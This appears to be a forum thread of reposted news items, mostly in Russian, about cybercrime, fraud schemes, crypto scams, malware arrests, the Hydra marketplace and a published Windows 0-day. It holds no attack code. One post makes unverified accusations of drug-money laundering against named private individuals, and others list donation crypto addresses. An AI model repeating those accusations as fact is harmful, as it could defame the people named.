В 47 финале, помимо российских команд золото получили команды Пекинского университета и Университета Harbour.Space из Испании. На пятом и шестом месте разместились китайские команды университетов Цинхуа и Нанкинского. Седьмое место заняла команда из Южной Кореи, а студенты из Университета Ватерлоо (Канада) забрали последнюю серебряную медаль. Бронзу забрали команды из Японии, США и Польши.
Не первая и не последняя победа
Чемпионат ICPC проводится каждый год. Первое соревнование состоялось в 1970 г. За последние 20 лет Россия регулярно попадала в топ и завоевывала золотые медали.
Например, в 2004 г. золотые медали достались Санкт-Петербургскому университету ИТМО (первое место) и Пермскому государственному университету (четвертое место), в 2005 г. – Московскому государственному университету (МГУ) и университету ИТМО (второе и третье места соответственно), в 2006 г. — Алтайскому государственному техническому университету (третье место) и Саратовскому государственному университету (СГУ, первое место). В 2007 г. «золото» завоевала команда ИТМО (третье место), а год спустя они стали победителями. Золотая медаль также была присуждена команде Ижевского государственного технического университета (третье место).
Россия продолжала выигрывать и в 2009 г., завоевав три золотые медали из четырех. Это заслуга команды ИТМО (победителя), а также Санкт-Петербургского и Саратовского государственных университетов (третье и четвертое места).
В 2010 г. среди победителей оказался только МГУ (второе место), в 2011 г. — Санкт-Петербургский государственный университет (СПбГУ, четвертое место). На следующий год «золото» досталось ИТМО (победителю) и МФТИ (третье место).
В 2013 г. Россия благодаря студентам ИТМО заняла первое место на чемпионате ICPC, который прошел в Санкт-Петербурге. Всего среди медалистов были четыре российских вуза.
В 2014 г. Россия снова стала первой. Победителями ICPC стали студенты Санкт- Петербургского государственного университета.
Ситуация не изменилась и в последующие годы. В 2017 г. первое место присудили команде ИТМО, а в 2018 и 2019 гг. его получила команда МГУ
В 2021 г. первое место взяли студенты Нижегородского госуниверситета им. Н. И. Лобачевского. Россия победила в этом соревновании в восьмой раз подряд — с 2013 г. первые места доставались ей, за исключением 2020 г., когда ICPC был отменен из-за коронавируса.
Некоторые участники криптосообщества заподозрили в скаме маркетплейс невзаимозаменяемых токенов BitClout, назвав его «Bitconnect 2.0».
BitClout позиционируется как децентрализованная социальная сеть. Проект предоставляет возможность покупки токенов, привязанных к именам владельцев 15 000 известных Twitter-аккаунтов, включая Илона Маска и Кэти Перри.
Согласно whitepaper, проект использует «блокчейн собственной разработки с архитектурой, аналогичной биткоину». Цена коррелирует с активностью известных личностей.
«Инфлюенсер, публикующий твит о сайте, может получить некоторую часть токенов, ассоциируемых с его личностью. Илон Маск теоретически имеет право на соответствующие токены BitClout общей стоимостью $2,96 млн», — говорится в материале Decrypt.
Среди опубликовавших твит о BitClout — Нил Страусс, автор книги «Игра» («The Game: Penetrating the Secret Society of Pickup Artists»), в которой рассказывается о и его становлении в качестве пикапера.
Anyone trying Bitclout yet? I’m at https://t.co/5n1Jboms5Y
Public key: BC1YLgWTMT1hecivzS4N1Dvu4UZGPZJkJQUdJRQmhSTsqD2D7LsJSV2— Neil Strauss (@neilstrauss) March 17, 2021
Click to expand...
При переходе по ссылке из твита Страусса сайт проекта выдает сообщение:
«Добро пожаловать в блокчейн BitClout. Требуется пароль для доступа к этой ноде».
В whitepaper указано, что для участия в экосистеме нужно обзавестись токенами проекта, купив их за первую криптовалюту на странице Buy BitClout. Однако при переходе по ссылке появляется вышеупомянутое сообщение:
В материале Decrypt говорится, что вывести токены проекта из платформы нельзя. Можно лишь приобрести монеты BitClout за биткоин, а затем отправлять их другим участникам, либо покупать «Creator Coins» внутри закрытой экосистемы.
Транзакции с токенами BitClout отследить нельзя. Код проекта от анонимных разработчиков не опубликован.
Средства пользователей поступали на единый биткоин-адрес. Его баланс на момент написания составляет 2881,97531607 BTC (около $170 млн по текущему курсу).
Глава блокчейн-компании CipherBlade Рич Сандерс пришел к выводу, что привлеченные проектом средства поступают на три криптовалютные платформы:
88,41% — Amber Group;
11,17% — Kraken;
0,42% — Coinbase.
Затем монеты отправляются на другие биржи и кошельки.
Связанные с BitClout потоки средств. Данные: Decrypt, CipherBlade.
На схеме выше также видно, что BitClout взаимодействовал с известным даркнет- маркетплейсом Hydra.
Представители фирмы Coinfirm, специализирующейся на отслеживании подозрительных транзакций, сравнили BitClout с мошенническим криптопроектом Bitconnect.
By Joe Mullin | March 8, 2021

Federal law enforcement has been [asking for a
backdoor](https://www.eff.org/deeplinks/2019/07/doj-and-fbi-show-no-signs-
correcting-past-untruths-their-new-attacks-encryption) to read Americans’
encrypted communications for years now. FBI Director Christopher Wray did it
again last week in testimony to the Senate Judiciary
Committee.
As usual, the FBI’s complaints involved end-to-end encryption employed by
popular messaging platforms, as well as the at-rest encryption of digital
devices, which Wray described as offering “user-only
access.”
The FBI wants these terms to sound scary, but [they actually describe security
best practices](https://www.eff.org/deeplinks/2021/02/incoming-biden-
administration-officials-should-change-course-encryption). End-to-end
encryption is what allows users to exchange messages without having them
intercepted and read by repressive governments, corporations, and other bad
actors. And “user-only access” is actually a perfect encapsulation of how
device encryption should work; otherwise, anyone who got their hands on your
phone or laptop—a thief, an abusive partner, or an employer—could access its
most sensitive data. When you intentionally weaken these systems, it hurts our
security and privacy, because there’s no magical kind of access that only
works for the good guys. If Wray gets his special pass to listen in on our
conversations and access our devices, corporations, criminals, and
authoritarians will be able to get the same access.
It’s remarkable that Wray keeps getting invited to Congress to [sing the same
song](https://www.eff.org/deeplinks/2019/12/fancy-new-terms-same-old-
backdoors-encryption-debate-2019). Notably, Wray was invited there to talk, in
part, about the January 6th insurrection, a serious domestic attack in which
the attackers—far from being concerned about secrecy—proudly broadcast many of
their crimes, resulting in hundreds of arrests.
It’s also remarkable what Wray, once more, chose to leave out of this
narrative. While Wray continues to express frustration about what his agents
can’t get access to, he fails to brief Senators about the shocking frequency
with which his agency already accesses Americans’ smartphones. Nevertheless,
the scope of police snooping on Americans’ mobile phones is becoming clear,
and it’s not just the FBI who is doing it. Instead of inviting Wray up to
Capitol Hill to ask for special ways to invade our privacy and security,
Senators should be asking Wray about the private data his agents are already
trawling through.
Phones**
In all 50 states, police are breaking into phones on a vast scale. An October
report from the non-profit Upturn, “Mass
Extraction,” has
revealed details of how invasive and widespread police hacking of our phones
has become. Police can easily purchase forensic tools that extract data from
nearly every popular phone. In March 2016, Cellebrite, a popular forensic tool
company, supported “logical extractions” for 8,393 different devices, and
“physical extractions,” which involves copying all the data on a phone bit-by-
bit, for 4,254 devices. Cellebrite can bypass lock screens on about 1,500
different devices.
How do they bypass encryption? Often, they just guess the password. In 2018,
Prof. Matthew Green
estimated it
would take no more than 22 hours for forensic tools to break into some older
iPhones with a 6-digit passcode simply by continuously guessing passwords
(i.e. “brute-force” entry). A 4-digit passcode would fail in about 13 minutes.
That brute force guessing was enabled by a hardware flaw that has been fixed
since 2018, and the rate of password guessing is much more limited now. But
even as smartphone companies like Apple improve their security, device hacking
remains very much a cat-and-mouse game. As recently as September 2020,
[Cellebrite marketing materials](https://cf-media.cellebrite.com/wp-
content/uploads/2020/09/SolutionOverview_CAS_2020.pdf) boasted its tools can
break into iPhone devices up to “the latest iPhone 11/ 11 Pro / Max running
the latest iOS versions up to the latest 13.4.1”
Even when passwords can’t be broken, vendors like Cellebrite offer “advanced
services” that can unlock even the newest iOS and Samsung devices. Upturn
research suggests the base price on such services is $1,950, but it can be
cheaper in bulk.
Buying electronic break-in technology on a wholesale basis represents the best
deal for police departments around the U.S., and they avail themselves of
these bargains regularly. In 2018, the Seattle Police Department purchased 20
such
“actions”
from Cellebrite for $33,000, allowing them to extract phone data within weeks
or even days. Law enforcement agencies that want to unlock phones en masse can
bring Cellebrite’s “advanced unlocking” in-house, for prices that range from
$75,000 to $150,000.
That means for most police departments, breaking into phones isn’t just
convenient, it’s relatively inexpensive. Even a mid-sized police department
like Virginia Beach, VA [has a police budget of more than $100
million](https://www.usatoday.com/story/money/2020/06/26/how-much-money-goes-
to-police-departments-in-americas-largest-cities/112004904/); New York City’s
police budget is over $5 billion. The FBI’s 2020 budget request is [about $9
billion](https://www.fbi.gov/news/testimony/fbi-budget-request-for-fiscal-
year-2020).
When the FBI says it’s “going dark” because it can’t beat encryption, what
it’s really asking for is a method of breaking in that’s cheaper, easier, and
more reliable than the methods they already have. The only way to fully meet
the FBI’s demands would be to require a backdoor in all platforms,
applications, and devices. Especially at a time when police abuses nationwide
have come into new focus, this type of complaint should be a non-starter with
elected officials. Instead, they should be questioning how and why police are
already dodging encryption. These techniques aren’t just being used against
criminals.
Upturn has documented more than 2,000 agencies across the U.S. that have
purchased products or services from mobile device forensic tool vendors,
including every one of the 50 largest police departments, and at least 25 of
the 50 largest sheriffs’ offices.
Law enforcement officials like Wray want to convince us that encryption needs
to be bypassed or broken for threats like terrorism or crimes against
children, but in fact, Upturn’s public records requests show that police use
forensic tools to search phones for everyday low-level crimes. Even when
police don't need to bypass encryption—such as when they convince someone to
"consent" to the search of a phone and unlock it—these invasive police phone
searches are used “as an all-purpose investigative tool, for an astonishingly
broad array of offenses, often without a warrant,” as Upturn put it.
The 44 law enforcement agencies who provided records to Upturn revealed at
least 50,000 extractions of cell phones between 2015 and 2019. And there’s no
question that this number is a “severe undercount,” counting only 44 agencies,
when at least 2,000 agencies have the tools. Many of the largest police
departments, including New York, Chicago, Washington D.C., Baltimore, and
Boston, either denied Upturn’s record requests or did not respond.
“Law enforcement… use these tools to investigate cases involving graffiti,
shoplifting, marijuana possession, prostitution, vandalism, car crashes,
parole violations, petty theft, public intoxication, and the full gamut of
drug-related offenses,” Upturn reports. In Suffolk County, NY, 20 percent of
the phones searched by police were for narcotics cases. Authorities in Santa
Clara County, CA, San Bernardino County, CA, and Fort Worth, TX all reported
that drug crimes were among the most common reasons for cell phone data
extractions. Here are just a few examples of the everyday offenses in which
Upturn found police searched phones:
And these searches often take place without judicial warrants, despite the
U.S. Supreme Court’s clear ruling in [Riley v.
California](https://www.eff.org/cases/supreme-court-cases-cell-phone-
searches) that a warrant is required to search a cell phone. That’s because
police frequently abuse rules around so-called consent searches. These types
of searches are widespread, but they’re hardly consensual. In January, we
wrote about how these [so-called “consent searches” are extraordinary
violations](https://www.eff.org/deeplinks/2021/01/so-called-consent-searches-
harm-our-digital-rights) of our privacy.
Forensic searches of cell phones are increasingly common. The Las Vegas
police, for instance, examined 260% more cell phones in 2018-2019 compared
with 2015-2016.
The searches are often overbroad, as well. It’s not uncommon for data
unrelated to the initial suspicions to be copied, kept, and used for other
purposes later. For instance, police can deem unrelated data to be “gang
related,” and keep it in a “gang database,” which have often vague standards.
Being placed in such a database can easily affect peoples’ future employment
options. Many police departments don’t have any policies in place about when
forensic phone-searching tools can be used.
Rather than listening to a litany of requests for special access to personal
data from federal agencies like the FBI, Congress should assert oversight over
the inappropriate types of access that are already taking place.
The first step is to start keeping track of what’s happening. Congress should
require that federal law enforcement agencies create detailed audit logs and
screen recordings of digital searches. And we agree with Upturn that agencies
nationwide should collect and publish aggregated information about how many
phones were searched, and whether those searches involved warrants (with
published warrant numbers), or so-called consent searches. Agencies should
also disclose what tools were used for data extraction and analysis.
Congress should also consider placing sharp limits on when consent searches
can take place at all. In our [January blog
post](https://www.eff.org/deeplinks/2021/01/so-called-consent-searches-harm-
our-digital-rights), we suggest that such searches be banned entirely in high-
coercion settings like traffic stops, and suggest some specific limits that
should be set in less-coercive settings.
[https://www.eff.org/deeplinks/2021/03/fbi-should-stop-attacking-encryption- and-tell-congress-about-all-encrypted- phones](https://www.eff.org/deeplinks/2021/03/fbi-should-stop-attacking- encryption-and-tell-congress-about-all-encrypted-phones)
СК расследует уголовное дело о хищении денег с банковских счетов белорусов. В одно производство соединено 4,5 тысяч дел в отношении 63 человек, из которых 30 задержаны и содержатся под стражей.
Со схемой «развода», наверное, встречался каждый белорус, владеющий смартфоном. Неизвестные организовали call-центры и на протяжении нескольких лет звонили белорусам с зарубежных номеров или через Viber. Представляясь работниками банков или правоохранительных органов, злоумышленники сообщали людям, что с их счетов вот-вот похитят деньги. Якобы для того чтобы воспрепятствовать хищению, мошенники требовали назвать реквизиты карт, либо перевести деньги на «безопасный счет». Иногда мошенники просили предоставить доступ к интернет-банкингу или установить приложение удаленного доступа. С помощью полученных данных аферисты похищали со счетов обманутых людей разные суммы.
Всего таким образом мошенники украли у белорусов свыше 3,5 миллионов рублей.
Расследование завершено в отношении 13 мужчин в возрасте от 17 до 34 лет. В Минске и Минском районе от их действий пострадали более 920 человек. Ущерб оценили на сумму более 1,5 млн рублей.
В Следственном комитете также рассказали, что один из фигурантов, которому всего 17 лет, подходил к прохожим на улице и просил воспользоваться их мобильными телефонами, так как у него якобы села батарейка. Получив доступ к гаджетам, молодой человек с помощью специального приложения оформлял заем у оператора связи и переводил деньги на подконтрольные ему счета. В итоге потерпевшие получали задолженность на телефоне в 100 рублей.
source: sk.gov.by/ru/news-usk-gminsk-ru/view/esche-13-lzhebankiram- predjjavleno-okonchatelnoe-obvinenie-11873
Полиция индийского города Фаридабад (штат Харьяна) арестовала группу из пяти мошенников, которые подменяли карточки под предлогом помощи незадачливым соотечественникам.
Обвиняемые вставали группой возле помещений с банкоматами под видом ждущих своей очереди людей. Подошедшей потенциальной жертве они предлагали помощь в снятии денег, чтобы та не стояла в очереди. После этого карточку подменяли, а деньги с нее снимали в банкоматах или с помощью POS-терминалов.
По данным полиции, эта схема принесла преступникам достаточно серьезные по местным меркам деньги.
Некогда популярные «карманные» банки теперь активно сменяются такими же «карманными» крипто-обменниками. В Сити таких полно, и у некоторых из них очень интересные учредители и подходы к ведению бизнеса. Понятное дело, у каждой такой обменки есть своя «крыша», и вот со всеми этими Смотрящими давно пора бы разобраться, потому что творится там полный беспредел.
Так, например, есть прекрасный обменник Grambit (grambit.bz). Примечателен он удивительным составом бенефициаров. Это двое ребят из ОГ, занимающейся поставкой наркотических средств в Петербурге и Москве (Илья Малюга и Александр Воробьев (@vrbbtc), известный также как Воробей. Оформлен же обменник на откровенного дропа (и не зря: никто из реальных учредителей в открытую мараться с нарко криптой не хочет). У тех же собственников еще два популярных обменника (https://changeproject.biz (в телеграмме @a_changes и @changeprojectbiz) и http://excoin.in/ )
Про каждого из фактических сособственников Grambit можно составить по целому досье, но тут обозначим лишь тезисы. Малюга интересен тем, что его отец разрабатывался Питерским УФСКН аж с 2012 года, до этого он был осужден и приговорен к 9 годам лишения свободы с конфискацией имущества за хранение кокаина. Воробей товарищ тоже занятный: есть обширная доказательная база регулярного приема на его Бинансовский аккаунт средств с Гидры, также он не раз попадал в зону пристального внимания правоохранительных органов по вопросам обращения наркотических средств.
Странно было бы предположить, что эти предприимчивые ребята моют через свою обменку в Сити крипту от нарко траффика, и при этоv не «крышуется» никакими дружественными сотрудниками МВД. Смотрящие точно есть, они точно в доле, и их давно пора бы уже обнаружить и проверить. Как вариант, их можно поискать среди тех, кто проявляет преднамеренную халатность при возбуждении уголовное дела по факту блокировки ворованной крипты, поступившей на аккаунт Grambit на Гарантексе.
Речь идет о достаточно нашумевшем в медийном пространстве деле, когда Grambit возбудил уголовное дело в отношении заблокированных Гарантексом 25 млн краденных рублей в крипте, причем заявление было подано от 100%го дропа, некого уроженца Санкт-Петербурга Сазонова Александра, 26 лет отроду, по уши в долгах, преследуемого приставами, и уж точно никак не напоминающего человека, у которого могли быть 25 млн рублей наличными. Даже если суду будут представлены какие-то документы, подтверждающие то, что Сазонов реально владел 25 млн рублей, скорее всего это будет банальный фейк.
Факт составления заявления от его лица является прямым нарушением статьи 306 УК РФ и уголовно наказуемо. Однако, никто из принявших к рассмотрению заявления сотрудников МВД не обратил внимание на заведомо ложный донос, и дело оперативно продвинули дальше по всем инстанциям. Вероятно, спасали свои же деньги, иначе зачем им так закрывать глаза на столь явное нарушение закона? Скорее всего, «крышу» этого карманного крипто обменка, обеспечивающего деятельность нарко ОГ надо поискать именно среди этих до странности «невнимательных» блюстителей правопорядка.
Мошенничество, связанное с криптовалютами, достигло рекордного уровня в 2021 году — ущерб составил около**$14 миллиардов** , что составляет 0.15% от общего количества транзакций с цифровыми валютами.
Согласно недавнему исследованию компании Coincub, безусловное лидерство в сфере криптомошенничества застолбила Северная Корея — на данный момент у правительства КНДР есть около 7 000 хакеров , которые приносят деньги в государственную казну, совершая множество успешных кибератак. По разным подсчетам, северокорейские хакеры совершили до 15 крупных криптопреступлений, прибыль от которых составила $1.6 млрд — $2 млрд (за 10 лет).
На второй строчке находится США — у них очень развита подпольной криптоэкономика, общая выручка от которой превысила $2 млрд.
Третье «почетное место» аналитики присудили России за огромное количество вредоносных программ-вымогателей, среди которых: Conti, REvil, Ryuk и Netwalker.
Также есть один интересный факт: российские власти закрывают глаза на подобные преступления, а иногда даже помогают в их деятельности. Предположительная сумма ущерба составила до $1.5 миллиарда.
Четвертое место занял Китай — хакеры с Поднебесной очень любят взламывать криптобиржи и создавать финансовые пирамиды, сумма ущерба от которых составила около $2.2 млрд.
«Замыкает пятерку лидеров» Великобритания , на территории которого было зафиксировано большое число хакерских атак и скама — только в 2021 году в стране было зарегистрировано 7 118 случаев криптомошенничества.
Несмотря на казалось бы огромные суммы, криптопреступления — это всего-навсего 0.15% от общего количества транзакций с цифровыми валютами. Для сравнения, преступная деятельность составляет порядка 2-5% от размера мирового ВВП.
source: coincub.com/top-5-countries-for-crypto-crime-2022
Гениальный индус целый год обманывал свой вуз, но спалился на том, что похвастался своей схемой на «Reddit»
Парень всё продумал: он выкупил домен своей школы (!!!), чтобы подделать от их лица свой табель успеваемости и написал рекомендательное письмо. Затем он сделал фейковые документы о смерти отца, чтобы точно получить полную стипендию и оплату перелетов из Индии в США и обратно.
Знаний для престижного Лехайского университета у него не было — на помощь пришли «ChatGPT» и люди, решающие домашку за деньги.
Парень жил свою лучшую жизнь, но имел неосторожность похвастаться всем этим на «Reddit». Теперь его депортируют из США обратно в Индию.
В соцсетях восхищаются тем, что он смог это все провернуть, но не понимают зачем нужно было себя палить. Вот к чему приводят понты.
Жительница США получила сообщение от кардера, который обиделся на свою жертву, узнав, что та отменила покупку авиабилетов, которые злоумышленник приобрел на украденные у женщины деньги. Деталями истории, впервые опубликованной на Reddit, [поделился Newsweek](https://www.newsweek.com/woman-email-man-hacked- credit-card-request-1802924).
Пользовательница с ником AshesfallforAshton рассказала журналистам, что ей 29 лет, и она живет в Денвере (штат Колорадо). Она получила на свой телефон уведомления о совершенных покупках в турагентстве Priceline и авиакомпании Delta Airlines. Тем не менее с помощью сотрудника своего банка ей удалось отменить заказ и вернуть украденные средства.
Вслед за этим неизвестный кардер попытался совершить еще несколько покупок. В частности, по словам AshesfallforAshton, он хотел приобрести «дверную панель, билеты в музей динозавров и какое-то место, посвященное Средневековью». Вскоре после этого мошенник купил еще один билет на самолет — из Детройта (штат Мичиган) в Роли (штат Северная Каролина). Отменив и эту покупку, девушка догадалась, что она была совершена с помощью аккаунта в Google, к которому была привязана банковская карточка. В частности, ей удалось авторизоваться на сайте Priceline, на котором она никогда не регистрировалась.
Через несколько дней после этого кардер-неудачник сам вышел на связь с жертвой, написав ей письмо на хорошо ему знакомый адрес электронной почты.
«Почему мой рейс отменили? — возмутился отправитель. — Не могли бы вы ответить? Мне нужно посетить семейное мероприятие».
AshesfallforAshton не стала вступать в переписку, отнеся скриншоты в полицию. Однако там, по ее словам, к проблеме отнеслись спустя рукава. После этого она выложила свою историю на Reddit, где она быстро завирусилась.
Компания оплатит год работы Мигеля Охеда (Miguel Ojeda)
над его проектом Rust for Linux.
Работа будет вестись в рамках проекта
Prossimo под эгидой организации ISRG
(Internet Security Research Group) — учредителя проекта Let's Encrypt.
По [данным Microsoft](https://github.com/Microsoft/MSRC-Security-
Research/blob/master/presentations/2019_02_BlueHatIL/2019_01%20-%20BlueHatIL%20-%20Trends%2C%20challenge%2C%20and%20shifts%20in%20software%20vulnerability%20mitigation.pdf)
около 70% всех уязвимостей, описанных в CVE, вызваны небезопасной работой с
памятью. Написание на Rust таких компонентов, как драйверы устройств, может
снизить риск появления уязвимостей.
[Подробности](https://www.memorysafety.org/blog/supporting-miguel-ojeda- rust-in-linux/)
Издание Bleeping Computer сообщило, что ИБ-исследователь опубликовал эксплоит для новой уязвимости нулевого дня, которая может использоваться для локального повышения привилегий во всех поддерживаемых версиях Windows, включая Windows 10, Windows 11 и Windows Server 2022.
Журналисты пишут, что уже опробовали эксплоит в действии и смогли открыть командную строку с правами SYSTEM, используя учетную запись с правами уровня Standard.
В этом месяце, в рамках «вторника обновлений», Microsoft устранила уязвимость [CVE-2021-41379](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-41379), связанную с повышением привилегий посредством Windows Installer. Эта проблема была обнаружена ИБ-исследователем Абдельхамидом Насери (Abdelhamid Naceri), который теперь сообщил о том, что патч можно обойти, а уязвимость после этого трансформируется в более серьезную проблему.
Насери уже опубликовал на GitHub PoC-эксплоит для новой 0-day проблемы, подчеркнув, что баг опасен для всех поддерживаемых версий ОС. Насери объясняет, что, можно настроить групповые политики таким образом, чтобы пользователи с правами уровня Standard не могли выполнять операции установщика MSI, однако новая уязвимость позволяет обойти эту политику.
«Этот вариант [уязвимости] был обнаружен во время анализа патча для CVE-2021-4137: ошибка была исправлена некорректно и напротив предоставила возможность обхода [исправления]», — пишет эксперт.
Когда журналисты поинтересовались у Насери, почему он публично раскрыл информацию о серьезной 0-day уязвимости, тот ответил, что разочарован уменьшением размера вознаграждений в bug bounty программу Microsoft.
«Bug bounty Microsoft испортилась в апреле 2020 года. Я правда не стал бы этого делать, если бы MSFT не приняла решение о понижении выплат», — пояснил специалист.
• Video: https://vimeo.com/648758294?embedded=true&source=video_title&owner=52361365
Сотрудники костромского УФСБ вместе с московскими коллегами задержали мужчину, который помогал мошенникам, узнал KOSTROMA.TODAY.
Как нам удалось узнать, хакер был членом преступной группы. Его роль заключалась в том, чтобы разрабатывать вирусы, которые воруют деньги через систему электронного банкинга.
«За осуществление указанной деятельности он получал от организатора преступной группы ежемесячное денежное вознаграждение в размере от 1 000 до 3 000 долларов США. Ущерб от указанной мошеннической деятельности составил свыше 2 млрд рублей», — говорится в сообщении пресс-службы регионального УФСБ.
Против мужчины возбудили уголовные дела по трем статьям: «Создание, использование и распространение вредоносных компьютерных программ», «Мошенничество в сфере компьютерной информации», «Организация преступного сообщества».
Накануне состоялся суд. Хакеру назначили 7,5 лет колонии общего режима.
• Source: <https://kostroma.today/news/kostromskoj-xaker-razrabatyval- moeennikam-programmy-dlya-krazhi-deneg/>
Полиция в Москве задержала бездомного, который после проверки по базам данных оказался Вячеславом Чикалиным — бывшим вице-президентом «Евразбанка» и экс- председателем совета директоров ПАО «Соль Руси». Чикалин, которого разыскивали за хищение и мошенничество, сообщил, что «бомжует» уже год, но официально служит в ВС РФ и даже участвует в СВО. В столицу он приехал в отпуск, просто погостить.
Мужчину задержали при проверке документов возле станции метро «Теплый стан» еще 28 ноября, однако известно об этом стало лишь сейчас. Биометрическая система распознавания лиц, используемая полицией, показала, что он в розыске.
После проверки выяснилось, что задержанного зовут Вячеслав Чикалин, ему 53 года, он разыскивается за мошенничество в особо крупном размере, совершенное организованной группой .
Он уже был судим по делу о хищении более 4 млрд рублей у банка «Транспортный», а до того занимал должность вице-президента «Евразбанка» и председателя совета директоров ПАО «Соль Руси» — печально известной финансовой пирамиды, жертвой которой становились преимущественно пенсионеры.
По сообщению агентства Regnum, в полиции бывший топ-менеджер сообщил о себе противоречивые сведения.
Он рассказал, что уже около года фактически является бездомным. Однако при этом проходит службу в армии в звании ефрейтора и участвует в спецоперации как стрелок.
Click to expand...
Последнее оказалось правдой. Источник ТАСС в правоохранительных органах подтвердил, что Чикалин подписал контракт с Минобороны.
«После того, как с мужчиной поработают следователи, вероятнее всего, он вновь вернется в зону СВО»
Click to expand...
Как миллиардер попал в СИЗО, а затем на СВО.
Личность Вячеслава Чикалина можно назвать по-своему примечательной. В середине 2000-х он одновременно являлся вице-президентом «Евразбанка» и старостой прихода храма во имя Преображения Господня в столичном микрорайоне Беляево. А затем оказался участником финансовой пирамиды компании «Соль Руси», которая привлекала деньги для строительства соляного завода в Нижегородской области, но предприятие так и не заработало.
В 2018 году Чикалина арестовали и отправили в СИЗО. Как писал «Коммерсантъ», его вместе с председателем правления банка «Транспортный» Еленой Плетневой обвиняли в хищении из «Транспортного» более 4 млрд рублей, которые они, по версии следствия, вместе с другими сообщниками получили в виде кредитов по подложным документам.
В деле говорилось, что на Чикалина «возлагался подбор физических лиц, которым банк должен был выдать заведомо невозвратные кредиты, а также сбор подложных документов для их получения».
В деле фигурировали более 20 человек, признанных жертвами обмана — на них оформлялись кредиты для финансирования ПАО «Соль Руси».
Click to expand...
В 2019 году издание BFM.ru со ссылкой на постановление Девятого арбитражного апелляционного суда сообщало, что ПАО «Соль Руси», а также связанные с ним дочерние компании — всего лишь часть мошеннической схемы по незаконному обогащению.
Один из обманутых граждан — пенсионер Евгений Шарамонов — в январе 2017 года купил акции ПАО «Соль Руси». При подписании документов ему обещали золотые горы: и высокий процент, и то, что через год он обратно получит свои деньги. Мошенники утверждали, что вскоре будет построен соледобывающий завод и начнется разработка Белбажского месторождения. Но оказалось, что у компании нет никакой прибыли, проценты не начисляются, а стройка так и не началась. Спустя год выкупать акции никто не захотел. Пенсионер лишился 2,5 млн рублей.
В марте 2021 года Мещанский суд Москвы приговорил Чикалина к семи годам лишения свободы в колонии общего режима со штрафом в размере 800 тыс. рублей. Судя по тому, что в настоящее время он числится участником СВО, наказание он полностью не отбыл, заключив контракт с Министерством обороны.
Компании Flashpoint и Chainalysis представили совместный отчет, посвященный работе подпольного маркетплейса Hydra.
В 2015 году, сразу после запуска Hydra была известна как площадка по продаже наркотиков, но со временем ресурс расширился и там давно торгуют самыми разными нелегальными товарами и услугами, включая данные ворованных карт, поддельные документы, фальшивые деньги, хакерские услуги и многое другое.
Исследователи пишут, что за последние три года Hydra росла примерно на 624% за год, что в итоге сделало ее одной из популярнейших криминальных торговых площадок наших дней. Объемы транзакций маркетплейса тоже растут год от года. Так, если в 2016 году оборот площадки составлял около 9,4 млн долларов в год, то теперь он достиг отметки в 1,37 млрд долларов в год.
[](https://xakep.ru/wp- content/uploads/2021/05/349683/screenshot-2021-05-24-at-16-43-19.png)
Успех Hydra исследователи объясняют рядом факторов. Один из них – строгие правила ресурса. К примеру, с лета 2018 года продавец должен совершить не менее 50 успешных сделок, прежде чем ему будет разрешено снятие средств. Также необходимо иметь кошелек, содержащий не менее 10 000 долларов США.
Если говорить о криптовалютных биржах, обрабатывающих транзакции Hydra, в основном это так называемые «высокорисковые» ресурсы, игнорирующие Know Your Customer (KYC). По словам исследователей, большинство из них находится в России, и лишь небольшой процент транзакций маркеплейса проходит через криптовалютные платформы, связанные с законной торговлей.
В общей сложности было зарегистрировано более 1000 уникальных депозитных адресов и транзакции на сумму более 7 млн долларов, которые предположительно связаны с Hydra.
[](https://xakep.ru/wp- content/uploads/2021/05/349683/screenshot-2021-05-24-at-16-45-51.png)
Снятие средств осуществляется через платежные сервисы и биржи, «исключительно или преимущественно базирующиеся в России и в дружественных России странах Восточной Европы», — гласит отчет. Кроме того, Hydra требует, чтобы продавцы конвертировали свою прибыль в фиатную валюту, а именно российские рубли.
Интересно, что, невзирая на строгие правила, аккаунты Hydra сами по себе пользуются большим спросом. По данным экспертов из-за этого даже возник отдельный рынок, связанный с получением доступа к существующим учетным записям продавцов, а также нередки случаи, когда пользователи пытаются обойти требования площадки по выводу фиатной валюты. Подобное может стоить на черном рынке до 10 000 долларов США.
Источник: xakep.ru/2021/05/26/hydra-money/
Code:Copy to clipboard
BTC: 1Fx1bhbCwp5LU2gHxfRNiSHi1QSHwZLf7q
Code:Copy to clipboard
ETH/EWT: 0x5578840aae68682a9779623fa9e8714802b59946
Code:Copy to clipboard
ETH: 0xefb33ccafc98d5fdb27a6f5ff17350ca76bf3b53
Code:Copy to clipboard
TRX: TSpcue3bDfZNTP1CutrRrDxRPeEvWhuXbp
Code:Copy to clipboard
XRP: rfapBqj7rUkGju7oHTwBwhEyXgwkEM4yby
Прокуратура города Минска направила в суд уголовное дело в отношении 28-летнего уроженца столицы, которому инкриминированы разработка, использование, распространение и сбыт вредоносных компьютерных программ, несанкционированный доступ и неправомерное завладение компьютерной информацией.
Согласно материалам дела обвиняемый на веб-сайте «zеlеnka.guru» и в мессенджере Telegram подыскивал лиц, которым предлагал услуги по криптованию файлов: вносил в файлы заказчиков конкретный набор предписаний, определяющих достижение цели. Среди них – нарушение систем защиты, получение несанкционированного доступа к компьютерным системам, сетям и машинным носителям путем шифрования содержащегося в файлах вредоносного кода от обнаружения его антивирусным ПО, его скрытая распаковка и запуск в компьютерных системах, сетях и машинных носителях третьих лиц, а также предоставление возможности неправомерного, скрытого копирования пользовательской и системной информации с «зараженного компьютера» через конечное количество операций.
Он же путем копирования скрыто завладел пользовательской и системной информацией, которую с целью последующего использования, распространения и сбыта сохранил на материальном носителе.
В итоге обвиняемый получил несанкционированный доступ к компьютерным системам, сетям и машинным носителям 10 потерпевших.
В результате противоправной деятельности получен доход в сумме свыше 19 тыс. рублей.
После изучения материалов дела в прокуратуре города Минска пришли к выводу об обоснованности обвинения, достаточности собранных доказательств, полном и объективном исследовании обстоятельств преступлений. Согласились с квалификацией содеянного по ч.1 ст.354, ч.1 ст.349, ч.1 ст.352 Уголовного кодекса Республики Беларусь.
Избранную ранее в отношении обвиняемого меру пресечения в виде подписки о невыезде и надлежащем поведении прокурор оставил без изменения.
• Source: https://prokuratura.gov[.]by/ru/media/novosti/nadzor-za-resheniyami- po-ugolovnym-i-grazhdanskim-delam/vredonosnye-program/
What do you thin about this?
https://www.bleepingcomputer[.]com/...k-malware-from-abusing-sensitive- permissions/
Из-за кибератаки в первую очередь страдают клиенты компании – люди теряют
сознание в 12-часовых очередях к врачам.
Keralty – это колумбийский поставщик медицинских услуг, который управляет
международной сетью из 12 больниц и 371 медицинского центра в Латинской
